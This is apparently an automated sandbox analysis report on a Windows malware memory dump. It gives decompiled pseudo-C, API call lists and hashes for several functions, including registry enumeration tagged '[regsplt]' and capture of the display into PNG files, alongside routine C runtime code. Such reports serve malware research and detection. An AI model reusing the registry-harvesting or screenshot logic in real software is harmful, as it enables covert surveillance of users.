                                                                                                • _free.LIBCMT ref: 00444110
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1AC), ref: 00444122
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 0044419A
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004441C7
                                                                                                • _free.LIBCMT ref: 004442DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 314583886-0
                                                                                                • Opcode ID: 6df832b8d7e2a1e980441203f23640d2cfea4156c0f96e810c9845a3873a7b30
                                                                                                • Instruction ID: 28e16f1df85532f3daaa5ae9bc663f82d65e35abc3979ea33a8e3f072f87fb4a
                                                                                                • Opcode Fuzzy Hash: 6df832b8d7e2a1e980441203f23640d2cfea4156c0f96e810c9845a3873a7b30
                                                                                                • Instruction Fuzzy Hash: C9C15771E00244ABFB20DF69CC41BABBBB8EF95355F1401AFE58497242EB389E41C759
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00449EF5, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00449EF5(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E00440628(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E00440C6C(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E004414D5(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46c178; // 0x46c170
								 *_t133 = _t57;
								_t58 =  *0x46c17c; // 0x46d64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46c180; // 0x46d64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46c1a8; // 0x46c174
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46c1ac; // 0x46d650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E00440C6C(_t107, 4);
							_v20 = _t134;
							E004414D5(0);
							if(_t134 == 0) {
								L11:
								E004414D5(_v8);
								E004414D5(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044C344(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044C344(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044C344(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044C344(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044C344(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E00449E8C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E004414D5(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46c178;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E004414D5( *((intOrPtr*)(_t100 + 0x7c)));
							E004414D5( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































                                                                                                0x00449ef5
                                                                                                0x00449efe
                                                                                                0x00449f05
                                                                                                0x00449f08
                                                                                                0x00449f11
                                                                                                0x00449f30
                                                                                                0x00449f33
                                                                                                0x00449f38
                                                                                                0x00449f3f
                                                                                                0x00449f52
                                                                                                0x00449f53
                                                                                                0x00449f5c
                                                                                                0x00449f5e
                                                                                                0x00449f61
                                                                                                0x00449f64
                                                                                                0x00449f6a
                                                                                                0x00449f6d
                                                                                                0x00449f80
                                                                                                0x00449f88
                                                                                                0x0044a0e2
                                                                                                0x0044a0e5
                                                                                                0x0044a0ea
                                                                                                0x0044a0ec
                                                                                                0x0044a0f1
                                                                                                0x0044a0f4
                                                                                                0x0044a0f9
                                                                                                0x0044a0fc
                                                                                                0x0044a101
                                                                                                0x0044a104
                                                                                                0x0044a109
                                                                                                0x0044a072
                                                                                                0x0044a078
                                                                                                0x0044a07c
                                                                                                0x0044a07e
                                                                                                0x0044a07e
                                                                                                0x00000000
                                                                                                0x0044a07c
                                                                                                0x00449f95
                                                                                                0x00449f98
                                                                                                0x00449f9b
                                                                                                0x00449fa4
                                                                                                0x0044a039
                                                                                                0x0044a03c
                                                                                                0x0044a045
                                                                                                0x00000000
                                                                                                0x0044a04e
                                                                                                0x00449fad
                                                                                                0x00449fb2
                                                                                                0x00449fc6
                                                                                                0x00449fda
                                                                                                0x00449fe6
                                                                                                0x00449ff4
                                                                                                0x0044a00e
                                                                                                0x0044a02a
                                                                                                0x0044a054
                                                                                                0x0044a067
                                                                                                0x0044a058
                                                                                                0x0044a05c
                                                                                                0x0044a0cf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044a0d1
                                                                                                0x0044a0d3
                                                                                                0x0044a0d6
                                                                                                0x0044a0d8
                                                                                                0x0044a0db
                                                                                                0x0044a062
                                                                                                0x0044a064
                                                                                                0x0044a066
                                                                                                0x0044a066
                                                                                                0x0044a066
                                                                                                0x0044a05c
                                                                                                0x0044a06c
                                                                                                0x0044a06f
                                                                                                0x00000000
                                                                                                0x0044a06f
                                                                                                0x0044a02f
                                                                                                0x0044a034
                                                                                                0x00000000
                                                                                                0x0044a038
                                                                                                0x00449f72
                                                                                                0x00000000
                                                                                                0x00449f7a
                                                                                                0x00000000
                                                                                                0x00449f1b
                                                                                                0x00449f1b
                                                                                                0x00449f1d
                                                                                                0x00449f20
                                                                                                0x0044a080
                                                                                                0x0044a080
                                                                                                0x0044a088
                                                                                                0x0044a08a
                                                                                                0x0044a08a
                                                                                                0x0044a092
                                                                                                0x0044a097
                                                                                                0x0044a09b
                                                                                                0x0044a0a0
                                                                                                0x0044a0ab
                                                                                                0x0044a0b1
                                                                                                0x0044a09b
                                                                                                0x0044a0b5
                                                                                                0x0044a0ba
                                                                                                0x0044a0c0
                                                                                                0x00000000
                                                                                                0x0044a0c0

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 180ba7e6f5cf43c85908710e591c51e3653f9aa27e3417c63d91bce0d77fd7b2
                                                                                                • Instruction ID: 20c19765705e43f805e4d3dfcc6a85be5153841542d2b35ed8081d8b16cea321
                                                                                                • Opcode Fuzzy Hash: 180ba7e6f5cf43c85908710e591c51e3653f9aa27e3417c63d91bce0d77fd7b2
                                                                                                • Instruction Fuzzy Hash: 7D61F371940205AFEB20DF69C882BAEBBF4EF45720F14416BE944EB381EB349D419B59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00410DBD, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E00410DBD(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E00451ED0();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E00432D80(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E00403303(E004043E6(_t110,  &_v108,  &_v668, _t152, E00404260(_t110,  &_v56, "\n")));
							E00401EE2();
							_t112 =  &_v56;
							E00401EE2();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0043CDA6(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E00403303(E004043E6(_t110,  &_v56,  &_v43956, _t156, E00404260(_t110,  &_v132, "\n")));
								E00401EE2();
								E00401EE2();
								E00403428(E004053F2(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402076(_t110,  &_v56, "\n")));
								E00401FB9();
								E00401FB9();
								_t93 = E00402076(_t110,  &_v156, "[regsplt]");
								E00403428(E00402F0F( &_v132, E0040209D(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								E00401FB9();
								E00401FB9();
								_t112 =  &_v156;
								_t73 = E00401FB9();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}






































                                                                                                0x00410dbd
                                                                                                0x00410dc5
                                                                                                0x00410dcc
                                                                                                0x00410dd2
                                                                                                0x00410ddc
                                                                                                0x00410dde
                                                                                                0x00410de3
                                                                                                0x00410de6
                                                                                                0x00410df0
                                                                                                0x00410df3
                                                                                                0x00410e24
                                                                                                0x00410e2a
                                                                                                0x00410e2f
                                                                                                0x00410e35
                                                                                                0x00410e38
                                                                                                0x00410e53
                                                                                                0x00410e59
                                                                                                0x00410e5b
                                                                                                0x00410e80
                                                                                                0x00410e88
                                                                                                0x00410e8d
                                                                                                0x00410e90
                                                                                                0x00410e90
                                                                                                0x00410e95
                                                                                                0x00410e96
                                                                                                0x00410e35
                                                                                                0x00410e9b
                                                                                                0x00410ea0
                                                                                                0x00410ea6
                                                                                                0x00410eaa
                                                                                                0x00410eb0
                                                                                                0x00410eb2
                                                                                                0x00410eb9
                                                                                                0x00410ec0
                                                                                                0x00410ec1
                                                                                                0x00410ec8
                                                                                                0x00410ec9
                                                                                                0x00410ecb
                                                                                                0x00410ece
                                                                                                0x00410ef3
                                                                                                0x00410ef9
                                                                                                0x00410efb
                                                                                                0x00410f0a
                                                                                                0x00410f0f
                                                                                                0x00410f35
                                                                                                0x00410f3d
                                                                                                0x00410f45
                                                                                                0x00410f6a
                                                                                                0x00410f72
                                                                                                0x00410f7a
                                                                                                0x00410f8a
                                                                                                0x00410fb3
                                                                                                0x00410fbb
                                                                                                0x00410fc3
                                                                                                0x00410fc8
                                                                                                0x00410fce
                                                                                                0x00410fce
                                                                                                0x00410fd3
                                                                                                0x00410fd4
                                                                                                0x00410eb0
                                                                                                0x00410eaa
                                                                                                0x00410fe3

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: 0F$[regsplt]$hF
                                                                                                • API String ID: 3554306468-2958734333
                                                                                                • Opcode ID: e72c293795b439eed9824ebecc37ed77d6920adeb23597d1b9d2b25e0ba63e2b
                                                                                                • Instruction ID: ff46a6b3d7d9da94fbd09377df838802b0ffc9c910e1f7f70bb484437d037f56
                                                                                                • Opcode Fuzzy Hash: e72c293795b439eed9824ebecc37ed77d6920adeb23597d1b9d2b25e0ba63e2b
                                                                                                • Instruction Fuzzy Hash: A1513071900219AADB11EBD5DC81EEFB77CEF04304F50017AF605B2191EFB4AA49CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00444F7B, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 73%
                                                                                                			E00444F7B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46c00c; // 0x4cc22724
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46d800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46d800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00440685(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00446255( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00446255();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00430A5B(_v8 ^ _t136);
			}


































                                                                                                0x00444f83
                                                                                                0x00444f8a
                                                                                                0x00444f8d
                                                                                                0x00444f95
                                                                                                0x00444f99
                                                                                                0x00444fa5
                                                                                                0x00444fa8
                                                                                                0x00444fab
                                                                                                0x00444fb2
                                                                                                0x00444fba
                                                                                                0x00444fbd
                                                                                                0x00444fc3
                                                                                                0x00444fc9
                                                                                                0x00444fce
                                                                                                0x00444fd0
                                                                                                0x00444fd3
                                                                                                0x00444fd8
                                                                                                0x00444fe2
                                                                                                0x00444fe9
                                                                                                0x00444fec
                                                                                                0x00444ff3
                                                                                                0x00444ffa
                                                                                                0x00445026
                                                                                                0x0044504c
                                                                                                0x0044504e
                                                                                                0x00000000
                                                                                                0x00445028
                                                                                                0x0044502b
                                                                                                0x004450f2
                                                                                                0x004450fe
                                                                                                0x00445109
                                                                                                0x0044510e
                                                                                                0x00445031
                                                                                                0x00445038
                                                                                                0x0044503d
                                                                                                0x00445043
                                                                                                0x00445049
                                                                                                0x00000000
                                                                                                0x00445049
                                                                                                0x00445043
                                                                                                0x0044502b
                                                                                                0x00444ffc
                                                                                                0x00445000
                                                                                                0x00445003
                                                                                                0x00445009
                                                                                                0x0044500b
                                                                                                0x0044500e
                                                                                                0x00445012
                                                                                                0x0044504f
                                                                                                0x00445052
                                                                                                0x00445053
                                                                                                0x00445058
                                                                                                0x0044505e
                                                                                                0x00445064
                                                                                                0x00445073
                                                                                                0x00445079
                                                                                                0x0044507f
                                                                                                0x00445084
                                                                                                0x004450a0
                                                                                                0x00445113
                                                                                                0x00445119
                                                                                                0x004450a2
                                                                                                0x004450aa
                                                                                                0x004450b3
                                                                                                0x004450b9
                                                                                                0x00000000
                                                                                                0x004450bb
                                                                                                0x004450bd
                                                                                                0x004450c0
                                                                                                0x004450d9
                                                                                                0x00000000
                                                                                                0x004450db
                                                                                                0x004450df
                                                                                                0x004450e1
                                                                                                0x004450e4
                                                                                                0x00000000
                                                                                                0x004450e4
                                                                                                0x004450df
                                                                                                0x004450d9
                                                                                                0x004450b9
                                                                                                0x004450b3
                                                                                                0x004450a0
                                                                                                0x00445084
                                                                                                0x0044505e
                                                                                                0x00000000
                                                                                                0x004450e7
                                                                                                0x004450e7
                                                                                                0x0044511b
                                                                                                0x0044512d

                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004456F0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00444FBD
                                                                                                • __fassign.LIBCMT ref: 00445038
                                                                                                • __fassign.LIBCMT ref: 00445053
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00445079
                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,004456F0,00000000,?,?,?,?,?,?,?,?,?,004456F0,?), ref: 00445098
                                                                                                • WriteFile.KERNEL32(?,?,00000001,004456F0,00000000,?,?,?,?,?,?,?,?,?,004456F0,?), ref: 004450D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 127fb5347497e2ddee00f9833cb74db7520f615ed6b24a94c7aec983a16e2d71
                                                                                                • Instruction ID: 01bd3782909f5761c5b99469dd3eab84a6b1eb9c60e0772c8d9a3534b9d430ac
                                                                                                • Opcode Fuzzy Hash: 127fb5347497e2ddee00f9833cb74db7520f615ed6b24a94c7aec983a16e2d71
                                                                                                • Instruction Fuzzy Hash: 2A51D270E006099FDF10DFA8D885AEEBBB4EF09301F14416AE551E7252E6349941CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416141, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00416141(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00403098(__edx,  &_v1184, E00404260(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				E00401EE2();
				E004152EA( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46dd00(E00401F87(_t84), E0040247B(), _t120, _t123, _t73);
				_t124 = _t39;
				E00414E19( &_v1144, _t124);
				_t86 = L"image/png";
				E00415656(_t86,  &_v1112);
				E00414E91(E00401EDD( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(E00401F87(E00401E3B(0x46e3a4,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020C7(__edx,  &_v1224);
					_t54 = E004183CC(E00401EDD( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(E00401EDD( &_v1200));
						_t57 = E0040247B();
						E00405C28( &_v1048, E00401F87(0x46e5f0), _t57);
						_t60 = E0040247B();
						E00405D50(_t74,  &_v1056,  &_v1224,  &_v1184, E00401F87( &_v1232), _t60);
						E00403098(_t74,  &_v1120, E00404260(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						E00401EE2();
						_t67 = E00401EDD( &_v1120);
						E004020DE(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E0041843E(_t67);
						E00401EE2();
						E00401FB9();
					}
					_t48 = E00401FB9();
				}
				E00414E3F(_t48,  &_v1152);
				E00401FB9();
				return E00401EE2();
			}





































                                                                                                0x00416141
                                                                                                0x00416147
                                                                                                0x00416150
                                                                                                0x00416152
                                                                                                0x00416169
                                                                                                0x00416173
                                                                                                0x00416180
                                                                                                0x00416190
                                                                                                0x0041619a
                                                                                                0x004161a1
                                                                                                0x004161a8
                                                                                                0x004161b4
                                                                                                0x004161b9
                                                                                                0x004161d5
                                                                                                0x004161dd
                                                                                                0x004161f6
                                                                                                0x00416200
                                                                                                0x00416214
                                                                                                0x00416219
                                                                                                0x0041621b
                                                                                                0x0041622b
                                                                                                0x00416238
                                                                                                0x0041624d
                                                                                                0x00416256
                                                                                                0x00416272
                                                                                                0x00416292
                                                                                                0x0041629f
                                                                                                0x004162ab
                                                                                                0x004162bc
                                                                                                0x004162c3
                                                                                                0x004162d2
                                                                                                0x004162db
                                                                                                0x004162db
                                                                                                0x004162e4
                                                                                                0x004162e4
                                                                                                0x004162ed
                                                                                                0x004162f6
                                                                                                0x0041630a

                                                                                                APIs
                                                                                                  • Part of subcall function 004152EA: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                  • Part of subcall function 004152EA: CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 0041619A
                                                                                                  • Part of subcall function 00414E19: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414E2F
                                                                                                  • Part of subcall function 00414E91: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00414EA2
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • DeleteFileW.KERNEL32(00000000,0000001B), ref: 0041622B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                                                                                                • String ID: dat$hpg$image/png$png
                                                                                                • API String ID: 1095564277-4149092116
                                                                                                • Opcode ID: d6de3cbe19330614d2590e2b05c0d8e87b147a405a3fce26f9038a85f6be0c6c
                                                                                                • Instruction ID: 56354a2dae210a11cf7bfeb46c419da43eb19165d20f7fa48ce425920fa30a2a
                                                                                                • Opcode Fuzzy Hash: d6de3cbe19330614d2590e2b05c0d8e87b147a405a3fce26f9038a85f6be0c6c
                                                                                                • Instruction Fuzzy Hash: E64131711043405AC314FB72D896DEFB3A8AF91348F40493FF586631E2EF789A49C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A43E, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
